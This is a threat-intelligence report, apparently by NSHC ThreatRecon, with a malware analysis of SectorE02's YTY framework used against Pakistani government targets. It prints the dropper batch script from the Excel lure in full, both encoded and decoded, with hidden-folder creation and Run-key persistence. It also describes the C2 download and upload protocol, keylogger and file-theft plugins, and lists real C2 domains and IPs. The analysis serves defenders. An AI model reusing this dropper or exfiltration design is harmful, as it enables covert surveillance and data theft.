They are constantly using spear phishing emails attached to Microsoft Office document files. In particular, obfuscated macro scripts and PowerShell code are embedded in these document files to download additional malware. The SectorD11 group also develops and distributes malware that runs on Android smartphones for the purpose of monitoring civilian who are against SectorD government.

Currently, the SectorD hacking groups have increased the frequency of hacking activities against Western countries. This is mainly targeting the United States, which they have political and military disputes with, but also a pro-American nation in the Middle East. It is likely that the activities of SectorD hacking groups will be greatly dependent on how the US exerts its influence and military activities in the future.

5. SectorF Activity Features

The SectorF01 group was discovered performing hacking activities in Southeast Asia, Europe and North America, including Vietnam, United Kingdom and the United States. They have consistently used spear phishing emails with attached Microsoft Office document files, but recently attached compressed files containing obfuscated HTA script files as well. This bypasses the detection of security solutions using script-based malware and avoids making the target suspicious as it launches normal documents when running the HTA file.

Analysis of the recent hacking activity of SectorF01 shows they seem to have two purposes. The first is surveillance of organizations and individuals who are against their government. The second is the collection of high-tech info from advanced countries that are nurturing high-tech and industrial technologies, which assists their government’s economic development and upgrading purposes. Recently, the hacking activity of SectorF01 for the purpose of high-tech corporate espionage is increasing, and it is likely that their activities targeting high tech companies and countries will continue to increase in the future.

6. SectorH Activity Features

The SectorH01 group appears to be active as a contractor rather than belonging officially to a national security agency. Their hacking activities were found in Southeast Asia and South America, including India and Brazil. They mainly use spear phishing emails with Microsoft Office document files.

In this case, macro scripts within document files make use of PowerShell to download additional scripts from Pastebin (a text file storage site). This minimize the exposure of their next stage payload even if their initial malware is detected by a security solution, and can bypass the detection of security solution by using an external web site which is open to the Internet for distribution of their malware. SectorH01 group’s hacking activities were mainly carried out on their political competitor, India. However, recently their activities have been found in other regions, and we will continue monitoring them in order to further understand the purpose of the SectorH group.

7. Cyber Crime Activity Features

Hacking groups included as part of SectorJ are those that perform high profile cyber crime activities to seize financial information that can generate an economic profit. In June, a total of two hacking groups were found among these Cyber Crime Groups and their hacking activities were found over a wide range of areas.

The hacking activities of the SectorJ01 group are mainly found in China, Germany, Slovenia, Sweden, Romania, Russia, US, Brazil, and Costa Rica. The SectorJ01 group uses Spear Phishing emails which have attached documents that utilize known code execution vulnerabilities in Microsoft Office. They also use Cobalt Strike, a common penetration testing tool.

SectorJ04 Group is one of the most active groups in recent years, and its activities have been found in a wide range of regions: Europe, Asia, North and South America, Africa. Specific countries include Switzerland, Russia, Macedonia, France, Ukraine, Italy, Germany, France, South Korea, Philippines, Taiwan, China, USA, Ecuador, and Senegal.

Similar to the past, they use spear phishing emails which have attached Microsoft Office document files with embedded macro scripts that will download malware. Sometimes they use HTML file attachments too. Recently, the SectorJ04 group hacked organizations such as universities, manufacturing companies, and construction companies, so their targets were not limited to just financial companies anymore. They have also extended their activities to industrial areas, where the security posture is typically relatively weaker compared to financial companies, so this is one way they are attempting to generate high profits through low effort. As SectorJ04 group’s hacking targets are diversified, it is likely that many cases of financial losses will occur in various countries across many industries.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

SectorE02 Updates YTY Framework in New Targeted Campaign Against Pakistan Government

Overview

From March to July this year, the ThreatRecon team noticed a spear phishing campaign by the SectorE02 group going on against the Government of Pakistan and organizations there related to defense and intelligence. Spear phishing emails are sent to their victims via Excel XLS files, which asks their victims to enable macros which will end up executing the downloader. Malicious document lures they have employed in recent times include a document purporting to be for registration for the Pakistan Air Force.

Security advisory by the Pakistan government regarding targeted attacks

SectorE02 is a threat actor which targets countries in South Asia, especially Pakistan, since at least 2012. Their arsenal includes a modular framework researchers have dubbed the “YTY Framework”, which has a Windows and mobile version. Usage of this framework allows the SectorE02 group to constantly modify and even remake individual plugins of the framework, and pick and choose which plugins – if any – are sent to their victims. This modularity also allows the SectorE02 group to maintain low detections by antivirus engines because each module only does something simple and will not even work without certain previously dropped files. In this post, we will describe their lure document, first stage downloader, file plugin, screenshot plugin, keylogger plugin, and exfiltration uploader plugin.

Excel Spear Phishing

The excel file used by them had names such as Credit_Score.xls, Advance_Salary.xls, CSD_Schemes_2019.xls, and Agrani_Bank.xls. In some instances, it masqueraded as an Excel calculator from the National Bank of Pakistan.

Lure document 1

In later stages of the campaign, however, the group appeared to switch to using a MsgBox to show an error saying “This file is corrupted”.

Lure document 2

At the back, the excel macro would retrieve encoded data stored in itself, and the encoding here is just a simple decimal encoding with a comma (or exclamation mark) as a separator. The same encoding is used for the dropped executable, although more often one entire file is encoded as a zip archive containing two files – a batch script and executable which is then unzipped and executed.

All four files here are illustration copied files from the original “.txt”, “.pdf”, and “.inp” files which are actually executable binaries
Example Encoded Batch File in XLS Doc using Comma Separator
101,99,104,111,32,111,102,102,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,114,100,32,47,115,32,47,113,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,92,78,101,105,103,104,98,111,117,114,104,111,111,100,92,83,112,111,111,108,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,109,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,92,78,101,116,119,111,114,107,92,83,101,114,118,101,114,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,101,114,115,34,13,10,97,116,116,114,105,98,32,43,97,32,43,104,32,43,115,32,34,37,85,83,69,82,80,82,79,70,73,76,69,37,92,80,114,105,110,116,34,13,10,83,69,84,32,47,65,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,32,13,10,83,69,84,32,47,65,32,82,65,78,68,61,37,82,65,78,68,79,77,37,32,49,48,48,48,48,32,43,32,49,32,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,119,105,110,46,116,120,116,13,10,101,99,104,111,32,37,67,79,77,80,85,84,69,82,78,65,77,69,37,45,37,82,65,78,68,37,32,62,62,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,119,105,110,46,116,120,116,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,102,13,10,114,101,103,32,100,101,108,101,116,101,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,102,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,70,105,108,101,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,87,105,110,115,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,115,118,99,104,111,116,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,83,121,110,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,115,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,66,105,103,85,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,108,115,115,109,112,46,101,120,101,13,10,114,101,103,32,97,100,100,32,34,72,75,67,85,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,34,32,47,118,32,68,97,116,97,117,112,100,97,116,101,32,47,116,32,82,69,71,95,83,90,32,47,100,32,37,85,83,69,82,80,82,79,70,73,76,69,37,92,68,114,105,118,101,68,97,116,97,92,70,105,108,101,115,92,107,121,108,103,114,46,101,120,101,13,10,109,111,118,101,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,65,112,112,68,97,116,97,92,106,117,99,104,101,107,46,116,116,112,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,13,10,114,101,110,32,37,117,115,101,114,112,114,111,102,105,108,101,37,92,68,114,105,118,101,68,97,116,97,92,87,105,110,115,92,106,117,99,104,101,107,46,116,116,112,32,106,117,99,104,101,107,46,101,120,101,13,10,100,101,108,32,37,48

The dropped batch scripts follow the same basic format: creating folders with the hidden, system, and archive attributes, dropping the batch and executable files there, and setting persistence through either scheduled tasks or the autorun registry key. A text file containing the %COMPUTERNAME% variable and random digits will also be saved as “win.txt”, and this file is required for the executable downloader.

A dump showing the scheduled task created by the batch script

The batch file that is dropped is used for three main purposes: 1) to set up the first folder, which is used to store the text file containing the computer name, 2) to set up what we call the “common exfiltration folder” which each individual plugin uses for different purposes, and 3) to set up persistence via scheduled task or registry run keys.

Example Decoded Batch File in XLS Doc
/echo off rd /s /q %USERPROFILE%\Printers\Neighbourhood\Spools rd /s /q %USERPROFILE%\Print\Network\Server rd /s /q %USERPROFILE%\DriveData\Files rd /s /q %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Printers\Neighbourhood\Spools md %USERPROFILE%\DriveData\Files md %USERPROFILE%\DriveData\Wins md %USERPROFILE%\Print\Network\Server attrib +a +h +s “%USERPROFILE%\DriveData” attrib +a +h +s “%USERPROFILE%\Printers” attrib +a +h +s “%USERPROFILE%\Print” SET /A %COMPUTERNAME% SET /A RAND=%RANDOM% 10000 + 1 echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Files\win.txt echo %COMPUTERNAME%-%RAND% >> %USERPROFILE%\DriveData\Wins\win.txt reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /f reg delete “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /f reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Files /t REG_SZ /d %USERPROFILE%\DriveData\Wins\juchek.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Wins /t REG_SZ /d %USERPROFILE%\DriveData\Files\svchots.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigSyn /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssms.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v BigUpdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\lssmp.exe reg add “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v Dataupdate /t REG_SZ /d %USERPROFILE%\DriveData\Files\kylgr.exe move %userprofile%\AppData\juchek.ttp %userprofile%\DriveData\Wins ren %userprofile%\DriveData\Wins\juchek.ttp juchek.exe del %0

Downloader (b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384)

Looking at the latest downloader executable which masquerades its filename as an InPage word document (bgfRdstr54sf.inp), it starts off by using CreateEventA as a mutex with the value “ab567” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists. It polls the C2 server every 100 or so seconds. It uses the fixed user agent string “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”, and performs a HTTPS GET against servicejobs[.]life/orderme/<computername>-<random>.

This is a change from their previous URL structure, “/orderme”, which contained the file(s) to be downloaded, and this allows them to cherry pick their victims – unless the SectorE02 operator specifically places the next stage malware in the server directory for a particular victim, that victim will only ever be infected with the downloader.

The downloader malware accepts three commands from the server, when the Content-Type response is “Content-Type: application”, “Content-Type: cmdline”, or “Content-Type: batcmd”, which are used for saving files to disk or executing files/commands on the system. This is how the next stage downloader or plugins can be executed on the victim system.

Screenshot Plugin (f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5)

This executable plugin takes a screenshot every two minutes using the Windows API to draw the raw screen bitmap to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. It then converts this raw bitmap to a JPG in a new file and deletes the raw bitmap file.

Code in the screenshot plugin creating the raw bitmap

The screenshot files are named in the format of “tm_hour-tm_min-tm_sec-tm_year-tm_mday-tm_mon” [1].

Screenshot JPGs created by the screenshot plugin

Like some of the other YTY components, the obfuscated strings can be deobfuscated by running both the base64 and reverse string algorithm multiple (in this case, three) times.

The strings can be deobfuscated by running both the base64 and reverse algorithm three times

File Listing Plugin (d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa)

This executable plugin recursively searches through the “C:”, “D:”, “E:”, “F:”, “G:”, and “H:” drives, looking for interesting file extensions shown below. Several default folders are avoided by the malware.

Note that the “.inp” extension is for “Urdu InPage”, a word processing program which supports languages such as Urdu which is the national language of Pakistan. The extensions the 2019 version of this plugin did not previously look for are “.odt” and “.eml”, and “.rft” is just a spelling mistake they made of “.rtf”.

The latest version of the plugin looks for files with containing any of 14 different file extensions

It only looks for files modified later than year 2017 and saves the text data of all matching files found in %APPDATA%\DriveData\Files\clist.log using the format of “File Path|Size WriteTimestamp l_flag”.

File path and names for exfiltration are saved to a clist.log file

A copy of these matching files are also saved to the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The copied files are individually saved with the file names being the full file path to the copied file, with slashes becoming underscores.

Exact copies of files the plugin is looking for is saved to the common exfiltration folder

Keylogger Plugin (f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37)

This plugin starts off by using CreateEventA as a mutex with the value “k4351”. It saves user keystrokes and which window title those keystrokes were pressed in the common exfiltration folder, %USERPROFILE%\Print\Network\Server\. The file is saved as “<username>_YYYY_MM_DD(HH_mm_ss).txt”.

Example of input captured by the keylogger plugin

Uploader Plugin (d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e)

This plugin starts off by using CreateEventA as a mutex with the value “MyEvent3525” and only works if the file %USERPROFILE%\DriveData\Files\win.txt exists . While the other plugins dump their files into the common exfiltration folder, the uploader plugin takes the files from that folder and uploads it to the C2 server, which is the same server as the downloader C2 server. The uploaded files are deleted immediately after.

The uploader performs a HTTP POST to /upload/<computername> of the file using HTTP forms with the same hard coded user-agent as their downloader malware, “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0”.

Data sent to the C2 server through HTTPS for exfiltration

Summary

While the use of a modular framework is not a new concept, we see that the SectorE02 group’s continuous remaking of their YTY framework plugins which serve the same purpose allows them to keep detections by security tools at a minimum. Based on their campaigns and the plugins we have seen, we believe they may be recreating each plugin on a per-campaign basis, meaning that each attack campaign might be targeting with new binaries coded from scratch and be hardly detected by security tools. At the same time, their newfound cautiousness in protecting their binaries from being downloaded and limited targeting means that the hardest part of detecting and responding to the SectorE02 group may be finding their related binaries in the first place.

Indicators of Compromise

Malicious Excel Files (SHA-256)

1f64ab4db42ad68b4b99120ef6e9d1409cf606d31d932c0d306bb11c8ddcb2b4
5a70d423fb336448fc7a71fbc3c7a4f0397bc7fa1ec32f7cc42824a432051c33
95ea070bbfca04fff58a7092d61527aad0474914ffd2501d96991faad1388c7a
fdcf3873df6f83336539c4997ce69fce459737c6d655f1972422f861437858a9
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
7703c3385894dd3468c468745c747bf5c75f37a9b1fcaf2a1d0f291ecb7abce6
aa1c8adc4b7d352e487842b1d3017f627230ff1057350aaca1ffeb4d6abae16a
a06a5b1d63ca67da90ba6cd9cbc00d6872707a1b49d44de26d6eb5ce7dd7d545
cc2c2694d0284153605a98c0e7493fb90aff0d78e7f03e37c80fb505fbf3f93f
6d0a3c4b2414c59be1190710c09330f4dd07e7badc4194e592799783f1cfd055
42775c20aa5b73b2eaecb5b107ce59d105f978660e6e43f53f804733ce3f7cbe
f0c85a1c9cf80ad424acebbe7af54176d0cb778a639da2f2f59828af5bb79842

Dropped Batch Scripts (SHA-256)

92b12010772166647f510ad91731e931d58bc077bfc9f9d39adc678cc00fb65d
1b46735d6b6aebefd5809274de1aaa56b5fac314b33c2fa51b001e07b4f7e4d7
57a9a17baaf61de5cffa8b2e2ec340a179e7e1cd70e046cbd832655c44bc7c1d
cd03ed9e4f3257836e11016294c8701baa12414b59f221e556cbed16a946b205
ce1df70e96b4780329d393ff7a37513aec222030e80606ee3ef99b306951d74d
9169dab8579d49253f72439f7572e0aabeb685c5ca63bf91fff81502764e79bb

Dropped YTY Downloaders (SHA-256)

5acfd1b49ae86ef66b94a3e0209a2d2a3592c31b57ccbaa4bb9540fcf3403574
08b11f246e2ebcfc049f198c055fc855e0af1f8499ba18791e3232efa913b01a
62dfec7fe0025e8863c2252abb4ec1abdb4b916b76972910c6a47728bfb648a7
13f27543d03fd4bee3267bdc37300e578994f55edabc031de936ff476482ceb4
b874a158f019dc082a0069eb3f7e169fbec2b4f05b123eed62d81776a7ddb384
e726c07f3422aaee45187bae9edb1772146ccac50315264b86820db77b42b31c

YTY File Plugin

8fff7f07ebf0a1e0a4eabdcf57744739f39de643d831c36416b663bd243590e1
d71a1d993e9515ec69a32f913c2a18f14cdb52ef06e4011c8622b5945440c1aa

YTY Screenshot Plugin

f10f41bd38832596d4c449f81b9eb4129361aa4e4ebd4a8e8d2d8bf388934ca5

YTY Keylogger Plugin

f331f67baa2650c426daae9dee6066029beb8b17253f26ad9ebbd3a64b2b6a37

YTY File Exfiltration Uploader Plugin

d4e587b16fbc486a62cc33febd5438be3a9690afc1650af702ed42d00ebfd39e

IP Addresses

179[.]43[.]170[.]155
5[.]135[.]199[.]26

Domains

data-backup[.]online
servicejobs[.]life

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1158 Hidden Files and Directories
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1107 File Deletion
T1158 Hidden Files and Directories
T1066 Indicator Removal from Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
T1064 Scripting

Credential Access

T1056 Input Capture

Discovery

T1010 Application Window Discovery
T1083 File and Directory Discovery
T1082 System Information Discovery
T1497 Virtualization/Sandbox Evasion

Collection

T1119 Automated Collection
T1005 Data from Local System
T1039 Data from Network Shared Drive
T1025 Data from Removable Media
T1074 Data Staged
T1114 Email Collection
T1056 Input Capture
T1113 Screen Capture

Command and Control

T1043 Commonly Used Port
T1071 Standard Application Layer Protocol

Exfiltration

T1020 Automated Exfiltration
T1041 Exfiltration Over Command and Control Channel

References

[1] Microsoft Docs | localtime, _localtime32, _localtime64
https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/localtime-localtime32-localtime64?view=vs-2019